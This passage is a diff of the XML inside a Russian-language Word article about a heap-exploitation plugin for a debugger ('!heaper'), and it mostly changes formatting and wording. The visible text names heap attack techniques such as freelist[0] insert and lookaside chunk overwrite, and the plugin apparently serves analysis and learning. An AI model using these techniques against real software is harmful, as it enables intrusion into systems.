-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="18" name="Image18" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6332220" cy="5633085"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Можно также восстановить исходное значение командами '!heaper -r &lt;указатель на функцию&gt;' и '!heaper -r all'.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="20">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -3524,7 +3648,7 @@
             <wp:extent cx="4400550" cy="1762125"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapTopAndBottom/>
-            <wp:docPr id="19" name="Image19" descr=""/>
+            <wp:docPr id="17" name="Image19" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3532,13 +3656,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="19" name="Image19" descr=""/>
+                    <pic:cNvPr id="17" name="Image19" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3568,6 +3692,20 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>Восстановление указателя, пропатченного выше:</w:t>
       </w:r>
     </w:p>
@@ -3592,7 +3730,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="21">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="18">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -3603,7 +3741,7 @@
             <wp:extent cx="4676775" cy="6305550"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapTopAndBottom/>
-            <wp:docPr id="20" name="Image20" descr=""/>
+            <wp:docPr id="18" name="Image20" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3611,13 +3749,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="20" name="Image20" descr=""/>
+                    <pic:cNvPr id="18" name="Image20" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3670,23 +3808,50 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Существует множество других функций, поэтому я призываю читателя самостоятельно изучить возможности плагина и поделиться со мной обратной связью и идеями о том, что бы вы хотел добавить. Примеры некоторых предложений:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+        <w:t xml:space="preserve">Существует множество других функций, поэтому я призываю читателя самостоятельно изучить возможности плагина и поделиться со мной </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">своим мнением </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>и идеями о том, что бы вы хотел</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> добавить. Примеры некоторых предложений:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3699,6 +3864,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3711,6 +3880,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3723,49 +3896,40 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Добавить эвристики и убедиться, что их оценки достаточно точны. Начата работа над четырьмя видами атак:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:tab/>
-        <w:t>инверсия битов (bitmap flipping), вставка во freelist[0], поиск по freelist[0] и перезапись чанка в lookaside.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Как видите впереди много работы, но я надеюсь, это поможет кому-то разобраться с эксплуатацией кучи.</w:t>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Добавить эвристики и убедиться, что их оценки достаточно точны. Начата работа над четырьмя видами атак: инверсия битов (bitmap flipping), вставка во freelist[0], поиск по freelist[0] и перезапись чанка в lookaside.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Как видите, впереди много работы, но я надеюсь, это поможет кому-то разобраться с эксплуатацией кучи.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -3775,9 +3939,557 @@
       <w:pgNumType w:fmt="decimal"/>
       <w:formProt w:val="false"/>
       <w:textDirection w:val="lrTb"/>
+      <w:docGrid w:type="default" w:linePitch="100" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml">
+  <w:abstractNum w:abstractNumId="1">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+        <w:rFonts w:cs="OpenSymbol"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
